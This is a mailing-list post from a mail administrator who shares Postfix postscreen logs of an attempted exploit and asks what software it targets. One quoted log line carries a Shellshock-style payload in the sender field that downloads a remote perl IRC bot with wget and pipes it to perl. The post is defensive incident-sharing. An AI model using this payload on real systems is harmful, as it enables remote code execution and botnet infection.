Within the past several days, I've been monitoring a kind of exploit that
affects the 'from' RCPT part of the smtp conversation:
```
postfix/postscreen[633104]: PREGREET 8 after 0.09 from [159.89.232.70]:52350:
HELO x\r\n
postfix/postscreen[633104]: NOQUEUE: reject: RCPT from [159.89.232.70]:52350:
550 5.5.1 Protocol error; from=<() { :; }; wget -qO - 193.56.28.202/botF|perl>,
to=<root>, proto=SMTP, helo=<x>
postfix/postscreen[633104]: DATA without valid RCPT from [159.89.232.70]:52350
```
Does anyone know what kind of software is the target of this attack?
Obviously, its not postfix, which quickly drops the connection. Could it be
some kind of software that parses logs?
I'd appreciate your thoughts.
PS:
the payload is a perl IRC bot
_______________________________________________
mailop mailing list
[email protected]
https://list.mailop.org/listinfo/mailop
